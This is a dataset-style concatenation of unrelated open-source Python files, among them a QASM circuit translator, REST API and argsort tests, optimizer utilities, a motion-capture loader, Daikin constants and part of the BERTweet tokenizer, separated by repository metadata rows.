parser.add_argument('--output', '-o', default='svsim_circuit.py', help='output SV-Sim circuit python file (default: svsim_circuit.py)')
args = parser.parse_args()
#print (args.input)

# Parsing input and Writing to output
qasmfile = open(args.input, "r")
svfile = open(args.output, "w")
# Fixed preamble of the generated circuit script: it expects to be run as
# "python circuit.py n_qubits n_gpus".
svfile.write("import sys\n")
svfile.write("import svsim_py_omp_wrapper as svsim\n\n")
svfile.write("if (len(sys.argv) != 3):\n")
svfile.write("\tprint('$python circuit.py n_qubits n_gpus')\n")
svfile.write("\texit()\n\n")
parse(qasmfile, svfile)
svfile.close()
qasmfile.close()

# Total qubit count = base index of the last-declared register + its width.
maxvalidx = max(global_array, key=global_array.get)
nqubits = global_array[maxvalidx] + field_length[maxvalidx]

print ("== SV-Sim: Translating " + args.input + " to " + args.output + " ==")
print ("Number of qubits: " + str(nqubits))
print ("Number of basic gates: " + str(gate_num))
print ("Number of cnot gates: " + str(cx_num))

#cmd = "python " + args.output + " " + str(nqubits)
#os.system(cmd)
| 37.473973 | 146 | 0.501608 |
7dedf5a52db7af2a6c5e4b1ee3f502aec7c345ae | 7,550 | py | Python | slugs/tests/integration/test_slugs.py | OpenKMIP/SLUGS | 807b653442d0c4ba2a00b6e7dee5c7b988001a67 | [
"Apache-2.0"
] | 3 | 2019-01-26T06:31:22.000Z | 2019-05-07T06:21:17.000Z | slugs/tests/integration/test_slugs.py | OpenKMIP/SLUGS | 807b653442d0c4ba2a00b6e7dee5c7b988001a67 | [
"Apache-2.0"
] | 14 | 2018-03-14T14:36:49.000Z | 2019-01-25T22:23:39.000Z | slugs/tests/integration/test_slugs.py | OpenKMIP/SLUGS | 807b653442d0c4ba2a00b6e7dee5c7b988001a67 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2018, The Johns Hopkins University/Applied Physics Laboratory
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import pytest
import requests
import testtools
@pytest.mark.usefixtures("url")
class TestSLUGSAPI(testtools.TestCase):
    """Integration tests for the SLUGS REST API.

    Exercises every endpoint (users, groups, and their cross lookups) against
    a running service whose base URL is injected by the ``url`` pytest
    fixture as ``self.url``. The service is expected to be seeded with users
    John/Jane and groups Human/Male/Female.
    """

    def setUp(self):
        super(TestSLUGSAPI, self).setUp()

    def test_request_root(self):
        """
        Test that a root-level request yields the right response.
        """
        response = requests.get(self.url + '/')

        self.assertEqual(response.status_code, 200)

        json = response.json()
        self.assertIsInstance(json, dict)
        self.assertEqual(len(json.keys()), 2)
        self.assertIn('users', json.keys())
        self.assertIn('groups', json.keys())

        users = json.get('users')
        groups = json.get('groups')

        self.assertIsInstance(users, list)
        self.assertIsInstance(groups, list)
        self.assertEqual(len(users), 2)
        self.assertEqual(len(groups), 3)
        self.assertIn('John', users)
        self.assertIn('Jane', users)
        self.assertIn('Human', groups)
        self.assertIn('Male', groups)
        self.assertIn('Female', groups)

    def test_request_users(self):
        """
        Test that a users request yields the right response.
        """
        response = requests.get(self.url + '/users')

        self.assertEqual(response.status_code, 200)

        json = response.json()
        self.assertIsInstance(json, dict)
        self.assertEqual(len(json.keys()), 1)
        self.assertIn('users', json.keys())

        users = json.get('users')
        self.assertIsInstance(users, list)
        self.assertEqual(len(users), 2)
        self.assertIn('John', users)
        self.assertIn('Jane', users)

    def test_request_groups(self):
        """
        Test that a groups request yields the right response.
        """
        response = requests.get(self.url + '/groups')

        self.assertEqual(response.status_code, 200)

        json = response.json()
        self.assertIsInstance(json, dict)
        self.assertEqual(len(json.keys()), 1)
        self.assertIn('groups', json.keys())

        groups = json.get('groups')
        self.assertIsInstance(groups, list)
        self.assertEqual(len(groups), 3)
        self.assertIn('Human', groups)
        self.assertIn('Male', groups)
        self.assertIn('Female', groups)

    def test_request_invalid_resource(self):
        """
        Test that a request for an invalid resource yields the right response.
        """
        response = requests.get(self.url + '/invalid')

        self.assertEqual(response.status_code, 404)

    def test_request_users_user(self):
        """
        Test that a users request for a specific user yields the right
        response.
        """
        # A bare user lookup returns 200 with an empty (null) body.
        response = requests.get(self.url + '/users/John')

        self.assertEqual(response.status_code, 200)
        self.assertIsNone(response.json())

    def test_request_users_user_invalid(self):
        """
        Test that a users request for an invalid user yields the right
        response.
        """
        response = requests.get(self.url + '/users/invalid')

        self.assertEqual(response.status_code, 404)

    def test_request_groups_group(self):
        """
        Test that a groups request for a specific group yields the right
        response.
        """
        response = requests.get(self.url + '/groups/Human')

        self.assertEqual(response.status_code, 200)
        self.assertIsNone(response.json())

    def test_request_groups_group_invalid(self):
        """
        Test that a groups request for an invalid group yields the right
        response.
        """
        response = requests.get(self.url + '/groups/invalid')

        self.assertEqual(response.status_code, 404)

    def test_request_users_user_groups(self):
        """
        Test that a groups request for a specific user yields the right result.
        """
        response = requests.get(self.url + '/users/John/groups')

        self.assertEqual(response.status_code, 200)

        json = response.json()
        self.assertIsInstance(json, dict)
        self.assertEqual(len(json.keys()), 1)
        self.assertIn('groups', json.keys())

        groups = json.get('groups')
        self.assertIsInstance(groups, list)
        self.assertEqual(len(groups), 2)
        self.assertIn('Human', groups)
        self.assertIn('Male', groups)

    def test_request_users_user_invalid_resource(self):
        """
        Test that a users request for an invalid user resource yields the
        right result.
        """
        response = requests.get(self.url + '/users/John/invalid')

        self.assertEqual(response.status_code, 404)

    def test_request_groups_group_users(self):
        """
        Test that a users request for a specific group yields the right result.
        """
        response = requests.get(self.url + '/groups/Human/users')

        self.assertEqual(response.status_code, 200)

        json = response.json()
        self.assertIsInstance(json, dict)
        self.assertEqual(len(json.keys()), 1)
        self.assertIn('users', json.keys())

        users = json.get('users')
        self.assertIsInstance(users, list)
        self.assertEqual(len(users), 2)
        self.assertIn('John', users)
        self.assertIn('Jane', users)

    def test_request_groups_group_invalid_resource(self):
        """
        Test that a groups request for an invalid group resource yields the
        right result.
        """
        response = requests.get(self.url + '/groups/Human/invalid')

        self.assertEqual(response.status_code, 404)

    def test_request_users_user_groups_group(self):
        """
        Test that a groups request for a specific group for a specific user
        yields the right result.
        """
        response = requests.get(self.url + '/users/John/groups/Human')

        self.assertEqual(response.status_code, 200)
        self.assertIsNone(response.json())

    def test_request_users_user_groups_group_invalid(self):
        """
        Test that a groups request for an invalid group for a specific user
        yields the right result.
        """
        response = requests.get(self.url + '/users/John/groups/invalid')

        self.assertEqual(response.status_code, 404)

    def test_request_groups_group_users_user(self):
        """
        Test that a users request for a specific user for a specific group
        yields the right result.
        """
        response = requests.get(self.url + '/groups/Female/users/Jane')

        self.assertEqual(response.status_code, 200)
        self.assertIsNone(response.json())

    def test_request_groups_group_users_user_invalid(self):
        """
        Test that a users request for an invalid user for a specific group
        yields the right result.
        """
        response = requests.get(self.url + '/groups/Female/users/invalid')

        self.assertEqual(response.status_code, 404)
| 32.683983 | 79 | 0.636424 |
981ccb922d0b9e710a140b5259908c1e55c67ac4 | 2,430 | py | Python | python/oneflow/test/modules/test_argsort.py | Zhangchangh/oneflow | 4ea3935458cc83dcea0abd88dd613f09c57dc01a | [
"Apache-2.0"
] | 1 | 2021-09-13T02:34:53.000Z | 2021-09-13T02:34:53.000Z | python/oneflow/test/modules/test_argsort.py | Zhangchangh/oneflow | 4ea3935458cc83dcea0abd88dd613f09c57dc01a | [
"Apache-2.0"
] | null | null | null | python/oneflow/test/modules/test_argsort.py | Zhangchangh/oneflow | 4ea3935458cc83dcea0abd88dd613f09c57dc01a | [
"Apache-2.0"
] | 1 | 2021-01-17T03:34:39.000Z | 2021-01-17T03:34:39.000Z | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
from collections import OrderedDict
import numpy as np
from test_util import GenArgList, type_name_to_flow_type
import oneflow as flow
import oneflow.unittest
def _test_argsort(test_case, data_shape, axis, descending, data_type, device):
    """Check flow.argsort against numpy's argsort for one configuration."""
    input = flow.Tensor(
        np.random.randn(*data_shape),
        dtype=type_name_to_flow_type[data_type],
        device=flow.device(device),
    )
    of_out = flow.argsort(input, dim=axis, descending=descending)
    # numpy has no `descending` flag; negate the data to emulate it.
    np_input = -input.numpy() if descending else input.numpy()
    np_out = np.argsort(np_input, axis=axis)
    # Consistency with _test_tensor_argsort: validate the shape as well as
    # the flattened values.
    test_case.assertTrue(np.array_equal(of_out.numpy().shape, np_out.shape))
    test_case.assertTrue(np.array_equal(of_out.numpy().flatten(), np_out.flatten()))
def _test_tensor_argsort(test_case, data_shape, axis, descending, data_type, device):
    """Check Tensor.argsort against numpy's argsort for one configuration."""
    tensor = flow.Tensor(
        np.random.randn(*data_shape),
        dtype=type_name_to_flow_type[data_type],
        device=flow.device(device),
    )
    of_out = tensor.argsort(dim=axis, descending=descending)
    # Emulate descending order by negating the data before np.argsort.
    data = tensor.numpy()
    reference = np.argsort(-data if descending else data, axis=axis)
    test_case.assertTrue(np.array_equal(of_out.numpy().shape, reference.shape))
    test_case.assertTrue(np.array_equal(of_out.numpy().flatten(), reference.flatten()))
@flow.unittest.skip_unless_1n1d()
class TestArgsort(flow.unittest.TestCase):
    """Parameter sweep driving the argsort checks defined above."""

    def test_argsort(test_case):
        # Cartesian product of every configuration to exercise.
        arg_dict = OrderedDict()
        arg_dict["test_fun"] = [_test_argsort, _test_tensor_argsort]
        arg_dict["data_shape"] = [(2, 6, 5, 4), (3, 4, 8)]
        arg_dict["axis"] = [-1, 0, 2]
        arg_dict["descending"] = [True, False]
        arg_dict["data_type"] = ["double", "float32", "int32"]
        arg_dict["device"] = ["cpu", "cuda"]
        for arg in GenArgList(arg_dict):
            # arg[0] is the check function; the rest are its parameters.
            arg[0](test_case, *arg[1:])
# Allow running this test module directly with `python`.
if __name__ == "__main__":
    unittest.main()
| 35.735294 | 85 | 0.709053 |
d6788e3f4bc808414fadc8cd434abfb5b2b4000c | 3,901 | py | Python | optimizer/util/util.py | efuller-gov/dm3k | 6cd95d647d1dfe188d68601d06ae9c92d2e1acf4 | [
"CC-BY-4.0",
"Apache-2.0",
"CC0-1.0"
] | 2 | 2021-11-29T14:46:43.000Z | 2021-12-29T02:22:34.000Z | optimizer/util/util.py | efuller-gov/dm3k | 6cd95d647d1dfe188d68601d06ae9c92d2e1acf4 | [
"CC-BY-4.0",
"Apache-2.0",
"CC0-1.0"
] | null | null | null | optimizer/util/util.py | efuller-gov/dm3k | 6cd95d647d1dfe188d68601d06ae9c92d2e1acf4 | [
"CC-BY-4.0",
"Apache-2.0",
"CC0-1.0"
] | 1 | 2021-10-03T23:20:52.000Z | 2021-10-03T23:20:52.000Z | """
Contains utility functions used by all of optimizer
"""
import logging
import os
import time
from datetime import datetime
import psutil
log = logging.getLogger(__name__)
convertToMB = float(2 ** 20)
process = psutil.Process()
FULL_HOUSE_FULL_TRACE_KEYS = [
"allocated",
"activity",
"budget_used",
"picked",
"resource",
"selected",
"value",
]
FULL_HOUSE_FULL_TRACE_KEYS_ORIG = [
"container_name",
"child_budget_used",
"child_resource",
"child_activity",
"parent_budget_used",
"parent_resource",
"parent_activity",
"selected",
"value",
]
FULL_HOUSE_INPUT_DICT_KEYS = [
"req_child_amt",
"req_parent_amt",
"avail_child_amt",
"avail_parent_amt",
"activity_children",
"child_possible_allocations",
"parent_possible_allocations",
"child_score",
"resource_families",
]
FULL_HOUSE_INPUT_LIST_KEYS = ["child_resources", "parent_resources", "child_activities", "parent_activities", "force_list", "forbid_list"]
FULL_HOUSE_INPUT_KEYS = FULL_HOUSE_INPUT_DICT_KEYS + FULL_HOUSE_INPUT_LIST_KEYS + ["parent_budget_name"] + ["child_budget_name"]
def remove_old_temp_files(dir_name, days=0, hours=0, minutes=0, seconds=0):
    """
    Remove old temp files from *dir_name*.

    The age threshold is the sum of the given units; with no arguments it
    defaults to one hour (only files created in the last hour are kept).
    """
    now = time.time()
    # Collapse the individual units into a single threshold in seconds.
    total_seconds = seconds + 60 * (minutes + 60 * (hours + 24 * days))
    if total_seconds == 0:
        total_seconds = 3600
    cutoff = now - total_seconds
    for entry in os.listdir(dir_name):
        full_path = os.path.join(dir_name, entry)
        try:
            if os.stat(full_path).st_ctime < cutoff:
                os.remove(full_path)
        except FileNotFoundError as e:
            # Fail silently if the file disappeared underneath us.
            log.warning(e)
def time_mem_stamp():
    """
    Return the current time and memory usage.

    :return time_stamp: the current time as a datetime object.
    :return mem_stamp: the current process resident memory, in MB.
    """
    timestamp = datetime.now()
    mem_in_mb = process.memory_info()[0] / convertToMB
    return timestamp, mem_in_mb
def fh_append(append_dict, key, value, type_resources=None):
    """
    Append *value* under *key* in *append_dict*, creating the default
    container on first use; duplicate values are silently skipped.

    :param append_dict: dict being built up in place
    :param key: key to append under
    :param value: value to add if not already present
    :param str type_resources: Set to "child_resources" or "parent_resources"
        if modifying the resource_families dict
    :return: None
    """
    if type_resources is None:
        bucket = append_dict.setdefault(key, [])
    else:
        append_dict.setdefault(key, {"parent_resources": [], "child_resources": []})
        bucket = append_dict[key][type_resources]
    if value not in bucket:
        bucket.append(value)
#
def fh_extend(extend_dict, key, values, type_resources=None):
    """
    Extend the container under *key* in *extend_dict* with *values*, creating
    the default container on first use. Repeated values are still added, but
    a warning is logged.

    :param extend_dict: dict being built up in place
    :param key: key to extend under
    :param values: iterable of values to add
    :param str type_resources: Set to "child_resources" or "parent_resources"
        if modifying the resource_families dict
    :return: None
    """
    if type_resources is None:
        target = extend_dict.setdefault(key, [])
    else:
        extend_dict.setdefault(key, {"parent_resources": [], "child_resources": []})
        target = extend_dict[key][type_resources]
    if set(values) & set(target):
        log.warning("Adding repeated values to list at key %s", key)
    target.extend(values)
| 29.11194 | 138 | 0.672648 |
42a8e3a7dc3d90d963a200048be3c8e39bf8b86f | 1,250 | py | Python | examples/pybullet/gym/pybullet_envs/deep_mimic/env/motion_capture_data.py | joonkyu4220/bullet3 | a5fb6c158f6cb744f476d7f1a5fbf6bf611cd9e1 | [
"Zlib"
] | null | null | null | examples/pybullet/gym/pybullet_envs/deep_mimic/env/motion_capture_data.py | joonkyu4220/bullet3 | a5fb6c158f6cb744f476d7f1a5fbf6bf611cd9e1 | [
"Zlib"
] | null | null | null | examples/pybullet/gym/pybullet_envs/deep_mimic/env/motion_capture_data.py | joonkyu4220/bullet3 | a5fb6c158f6cb744f476d7f1a5fbf6bf611cd9e1 | [
"Zlib"
] | null | null | null | import json
import math
class MotionCaptureData(object):
    """Container for DeepMimic-style motion-capture clips loaded from JSON.

    A loaded clip is a dict with a "Frames" list; each frame is
    ``[duration, base_x, base_y, base_z, ...]`` (first four entries are the
    only ones this class reads).
    """

    def __init__(self):
        self.Reset()

    def Reset(self):
        """Clear any loaded motion data."""
        self._motion_data = []

    def Load(self, path):
        """Load a motion clip from the JSON file at *path*."""
        with open(path, 'r') as f:
            self._motion_data = json.load(f)

    def NumFrames(self):
        """Number of key frames in the loaded clip."""
        return len(self._motion_data['Frames'])

    def KeyFrameDuration(self):
        """Duration (seconds) of a single key frame, taken from frame 0."""
        return self._motion_data['Frames'][0][0]

    def getCycleTime(self):
        """Total duration of one playback cycle of the clip."""
        keyFrameDuration = self.KeyFrameDuration()
        cycleTime = keyFrameDuration * (self.NumFrames() - 1)
        return cycleTime

    def calcCycleCount(self, simTime, cycleTime):
        """Number of whole clip cycles elapsed after *simTime* seconds."""
        phases = simTime / cycleTime
        # Removed dead code: an unused `loop` flag and commented-out clamp.
        return math.floor(phases)

    def computeCycleOffset(self):
        """Base-position delta between the last and first frame of the clip.

        Cached on ``self._cycleOffset`` and returned; used to translate the
        character each time playback wraps around.
        """
        lastFrame = self.NumFrames() - 1
        frameData = self._motion_data['Frames'][0]
        frameDataNext = self._motion_data['Frames'][lastFrame]

        basePosStart = [frameData[1], frameData[2], frameData[3]]
        basePosEnd = [frameDataNext[1], frameDataNext[2], frameDataNext[3]]
        self._cycleOffset = [
            basePosEnd[0] - basePosStart[0], basePosEnd[1] - basePosStart[1],
            basePosEnd[2] - basePosStart[2]
        ]
        return self._cycleOffset
fbd838b9e47c80cc6171996f020cf0b334c7d92c | 565 | py | Python | homeassistant/components/daikin/const.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 30,023 | 2016-04-13T10:17:53.000Z | 2020-03-02T12:56:31.000Z | homeassistant/components/daikin/const.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 24,710 | 2016-04-13T08:27:26.000Z | 2020-03-02T12:59:13.000Z | homeassistant/components/daikin/const.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 11,956 | 2016-04-13T18:42:31.000Z | 2020-03-02T09:32:12.000Z | """Constants for Daikin."""
DOMAIN = "daikin"
ATTR_TARGET_TEMPERATURE = "target_temperature"
ATTR_INSIDE_TEMPERATURE = "inside_temperature"
ATTR_OUTSIDE_TEMPERATURE = "outside_temperature"
ATTR_TOTAL_POWER = "total_power"
ATTR_COOL_ENERGY = "cool_energy"
ATTR_HEAT_ENERGY = "heat_energy"
ATTR_HUMIDITY = "humidity"
ATTR_TARGET_HUMIDITY = "target_humidity"
ATTR_COMPRESSOR_FREQUENCY = "compressor_frequency"
ATTR_TOTAL_ENERGY_TODAY = "total_energy_today"
ATTR_STATE_ON = "on"
ATTR_STATE_OFF = "off"
CONF_UUID = "uuid"
KEY_MAC = "mac"
KEY_IP = "ip"
TIMEOUT = 60
| 23.541667 | 50 | 0.79646 |
aaeffd73800c8e3c6935b5b0dfe6b0a39d856647 | 27,592 | py | Python | src/transformers/models/bertweet/tokenization_bertweet.py | theainerd/transformers | f7328de46dbeda4992a093a0501932bf0fc7b76f | [
"Apache-2.0"
] | 34 | 2021-07-05T02:44:31.000Z | 2022-03-28T14:39:57.000Z | src/transformers/models/bertweet/tokenization_bertweet.py | theainerd/transformers | f7328de46dbeda4992a093a0501932bf0fc7b76f | [
"Apache-2.0"
] | 3 | 2021-07-22T15:49:44.000Z | 2022-03-19T08:46:27.000Z | src/transformers/models/bertweet/tokenization_bertweet.py | theainerd/transformers | f7328de46dbeda4992a093a0501932bf0fc7b76f | [
"Apache-2.0"
] | 6 | 2021-07-05T02:44:32.000Z | 2022-02-14T10:10:13.000Z | # coding=utf-8
# Copyright (c) 2020, VinAI Research and the HuggingFace Inc. team.
# Copyright 2018 The Open AI Team Authors and The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Tokenization classes for BERTweet """
import html
import os
import re
from shutil import copyfile
from typing import List, Optional, Tuple
import regex
from ...tokenization_utils import PreTrainedTokenizer
from ...utils import logging
logger = logging.get_logger(__name__)
VOCAB_FILES_NAMES = {
"vocab_file": "vocab.txt",
"merges_file": "bpe.codes",
}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"vinai/bertweet-base": "https://huggingface.co/vinai/bertweet-base/resolve/main/vocab.txt",
},
"merges_file": {
"vinai/bertweet-base": "https://huggingface.co/vinai/bertweet-base/resolve/main/bpe.codes",
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"vinai/bertweet-base": 128,
}
def get_pairs(word):
    """
    Return the set of adjacent symbol pairs in a word.

    Word is represented as a tuple of symbols (symbols being variable-length
    strings).
    """
    pairs = set()
    prev_char = word[0]
    for char in word[1:]:
        pairs.add((prev_char, char))
        prev_char = char
    # Removed the original's redundant `pairs = set(pairs)` — it is already a set.
    return pairs
class BertweetTokenizer(PreTrainedTokenizer):
"""
Constructs a BERTweet tokenizer, using Byte-Pair-Encoding.
This tokenizer inherits from :class:`~transformers.PreTrainedTokenizer` which contains most of the main methods.
Users should refer to this superclass for more information regarding those methods.
Args:
vocab_file (:obj:`str`):
Path to the vocabulary file.
merges_file (:obj:`str`):
Path to the merges file.
normalization (:obj:`bool`, `optional`, defaults to :obj:`False`)
Whether or not to apply a normalization preprocess.
bos_token (:obj:`str`, `optional`, defaults to :obj:`"<s>"`):
The beginning of sequence token that was used during pretraining. Can be used a sequence classifier token.
.. note::
When building a sequence using special tokens, this is not the token that is used for the beginning of
sequence. The token used is the :obj:`cls_token`.
eos_token (:obj:`str`, `optional`, defaults to :obj:`"</s>"`):
The end of sequence token.
.. note::
When building a sequence using special tokens, this is not the token that is used for the end of
sequence. The token used is the :obj:`sep_token`.
sep_token (:obj:`str`, `optional`, defaults to :obj:`"</s>"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
cls_token (:obj:`str`, `optional`, defaults to :obj:`"<s>"`):
The classifier token which is used when doing sequence classification (classification of the whole sequence
instead of per-token classification). It is the first token of the sequence when built with special tokens.
unk_token (:obj:`str`, `optional`, defaults to :obj:`"<unk>"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
pad_token (:obj:`str`, `optional`, defaults to :obj:`"<pad>"`):
The token used for padding, for example when batching sequences of different lengths.
mask_token (:obj:`str`, `optional`, defaults to :obj:`"<mask>"`):
The token used for masking values. This is the token used when training this model with masked language
modeling. This is the token which the model will try to predict.
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
def __init__(
    self,
    vocab_file,
    merges_file,
    normalization=False,
    bos_token="<s>",
    eos_token="</s>",
    sep_token="</s>",
    cls_token="<s>",
    unk_token="<unk>",
    pad_token="<pad>",
    mask_token="<mask>",
    **kwargs
):
    """Build the tokenizer from a vocabulary file and fastBPE merge codes."""
    super().__init__(
        normalization=normalization,
        bos_token=bos_token,
        eos_token=eos_token,
        sep_token=sep_token,
        cls_token=cls_token,
        unk_token=unk_token,
        pad_token=pad_token,
        mask_token=mask_token,
        **kwargs,
    )

    # `emoji` is optional: without it, emoticons/emojis are left untouched.
    try:
        from emoji import demojize

        self.demojizer = demojize
    except ImportError:
        logger.warning(
            "emoji is not installed, thus not converting emoticons or emojis into text. Please install emoji: pip3 install emoji"
        )
        self.demojizer = None

    self.vocab_file = vocab_file
    self.merges_file = merges_file

    # Reserve ids 0-3 for the special tokens before loading the vocabulary.
    self.encoder = {}
    self.encoder[self.bos_token] = 0
    self.encoder[self.pad_token] = 1
    self.encoder[self.eos_token] = 2
    self.encoder[self.unk_token] = 3

    self.add_from_file(vocab_file)

    self.decoder = {v: k for k, v in self.encoder.items()}

    # fastBPE codes file: each line is "<sym1> <sym2> <freq>"; drop the freq.
    with open(merges_file, encoding="utf-8") as merges_handle:
        merges = merges_handle.read().split("\n")[:-1]
    merges = [tuple(merge.split()[:-1]) for merge in merges]
    self.bpe_ranks = dict(zip(merges, range(len(merges))))
    self.cache = {}

    self.normalization = normalization
    self.tweetPreprocessor = TweetTokenizer()

    # Unicode punctuation normalized before tokenization.
    self.special_puncts = {"’": "'", "…": "..."}
def build_inputs_with_special_tokens(
    self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
    """
    Build model inputs by wrapping the id sequence(s) with BERTweet special
    tokens:

    - single sequence: ``<s> X </s>``
    - pair of sequences: ``<s> A </s></s> B </s>``

    Args:
        token_ids_0 (:obj:`List[int]`):
            List of IDs to which the special tokens will be added.
        token_ids_1 (:obj:`List[int]`, `optional`):
            Optional second list of IDs for sequence pairs.

    Returns:
        :obj:`List[int]`: List of input IDs with the appropriate special tokens.
    """
    result = [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
    if token_ids_1 is not None:
        result = result + [self.sep_token_id] + token_ids_1 + [self.sep_token_id]
    return result
def get_special_tokens_mask(
    self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None, already_has_special_tokens: bool = False
) -> List[int]:
    """
    Retrieve sequence ids from a token list that has no special tokens added. This method is called when adding
    special tokens using the tokenizer ``prepare_for_model`` method.

    Args:
        token_ids_0 (:obj:`List[int]`):
            List of IDs.
        token_ids_1 (:obj:`List[int]`, `optional`):
            Optional second list of IDs for sequence pairs.
        already_has_special_tokens (:obj:`bool`, `optional`, defaults to :obj:`False`):
            Whether or not the token list is already formatted with special tokens for the model.

    Returns:
        :obj:`List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
    """
    if already_has_special_tokens:
        if token_ids_1 is not None:
            raise ValueError(
                "You should not supply a second sequence if the provided sequence of "
                "ids is already formatted with special tokens for the model."
            )
        # Mark 1 wherever the id is <s> or </s>, 0 elsewhere.
        return list(map(lambda x: 1 if x in [self.sep_token_id, self.cls_token_id] else 0, token_ids_0))

    # Otherwise build the mask to match build_inputs_with_special_tokens:
    # <s> seq0 </s> (+ </s> seq1 </s> for pairs).
    if token_ids_1 is None:
        return [1] + ([0] * len(token_ids_0)) + [1]
    return [1] + ([0] * len(token_ids_0)) + [1, 1] + ([0] * len(token_ids_1)) + [1]
def create_token_type_ids_from_sequences(
    self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
    """
    Create a mask from the two sequences passed to be used in a sequence-pair
    classification task. BERTweet does not make use of token type ids,
    therefore a list of zeros (as long as the special-token-wrapped input)
    is returned.

    Args:
        token_ids_0 (:obj:`List[int]`):
            List of IDs.
        token_ids_1 (:obj:`List[int]`, `optional`):
            Optional second list of IDs for sequence pairs.

    Returns:
        :obj:`List[int]`: List of zeros.
    """
    # <s> seq0 </s> adds 2 tokens; a pair adds </s> seq1 </s>, i.e. 2 more.
    total_length = len(token_ids_0) + 2
    if token_ids_1 is not None:
        total_length += len(token_ids_1) + 2
    return [0] * total_length
@property
def vocab_size(self):
    # Size of the BPE vocabulary, special tokens included.
    return len(self.encoder)

def get_vocab(self):
    # Full token->id mapping, including tokens added after loading.
    return dict(self.encoder, **self.added_tokens_encoder)
def bpe(self, token):
    """Apply byte-pair encoding to one token; returns "@@ "-joined subwords."""
    if token in self.cache:
        return self.cache[token]
    # Represent the token as a tuple of symbols, suffixing the last symbol
    # with the end-of-word marker used by the merge codes.
    word = tuple(token)
    word = tuple(list(word[:-1]) + [word[-1] + "</w>"])
    pairs = get_pairs(word)

    if not pairs:
        return token

    while True:
        # Greedily merge the adjacent pair with the best (lowest) rank.
        bigram = min(pairs, key=lambda pair: self.bpe_ranks.get(pair, float("inf")))
        if bigram not in self.bpe_ranks:
            break
        first, second = bigram
        new_word = []
        i = 0
        while i < len(word):
            try:
                j = word.index(first, i)
            except ValueError:
                # No further occurrence of `first`; copy the tail verbatim.
                new_word.extend(word[i:])
                break
            else:
                new_word.extend(word[i:j])
                i = j

            # Collapse an adjacent (first, second) occurrence into one symbol.
            if word[i] == first and i < len(word) - 1 and word[i + 1] == second:
                new_word.append(first + second)
                i += 2
            else:
                new_word.append(word[i])
                i += 1
        new_word = tuple(new_word)
        word = new_word
        if len(word) == 1:
            break
        else:
            pairs = get_pairs(word)
    word = "@@ ".join(word)
    # Strip the trailing "</w>" marker (4 characters).
    word = word[:-4]
    self.cache[token] = word
    return word
def _tokenize(self, text):
    """Tokenize a string into BPE subword tokens."""
    if self.normalization:  # Perform Tweet normalization before performing BPE
        text = self.normalizeTweet(text)

    split_tokens = []
    # Split on whitespace (keeping a trailing newline with its word), then
    # BPE-encode each chunk.
    words = re.findall(r"\S+\n?", text)
    for token in words:
        split_tokens.extend([t for t in self.bpe(token).split(" ")])
    return split_tokens
def normalizeTweet(self, tweet):
    """
    Normalize a raw Tweet
    """
    # Map special unicode punctuation to ASCII equivalents first.
    for punct in self.special_puncts:
        tweet = tweet.replace(punct, self.special_puncts[punct])

    tokens = self.tweetPreprocessor.tokenize(tweet)
    normTweet = " ".join([self.normalizeToken(token) for token in tokens])

    # Normalize negation contractions split by the tokenizer.
    normTweet = (
        normTweet.replace("cannot ", "can not ")
        .replace("n't ", " n't ")
        .replace("n 't ", " n't ")
        .replace("ca n't", "can't")
        .replace("ai n't", "ain't")
    )
    # Detach contracted verb suffixes ('m, 're, 's, 'll, 'd, 've).
    normTweet = (
        normTweet.replace("'m ", " 'm ")
        .replace("'re ", " 're ")
        .replace("'s ", " 's ")
        .replace("'ll ", " 'll ")
        .replace("'d ", " 'd ")
        .replace("'ve ", " 've ")
    )
    # Re-join a.m./p.m. abbreviations the tokenizer broke apart.
    normTweet = (
        normTweet.replace(" p . m .", " p.m.")
        .replace(" p . m ", " p.m ")
        .replace(" a . m .", " a.m.")
        .replace(" a . m ", " a.m ")
    )

    # Collapse any repeated whitespace.
    return " ".join(normTweet.split())
def normalizeToken(self, token):
    """
    Normalize tokens in a Tweet
    """
    lowercased_token = token.lower()
    if token.startswith("@"):
        # User mentions are anonymized to a single placeholder.
        return "@USER"
    elif lowercased_token.startswith("http") or lowercased_token.startswith("www"):
        # URLs are replaced by a single placeholder token.
        return "HTTPURL"
    elif len(token) == 1:
        # Single characters: map special punctuation, demojize if available.
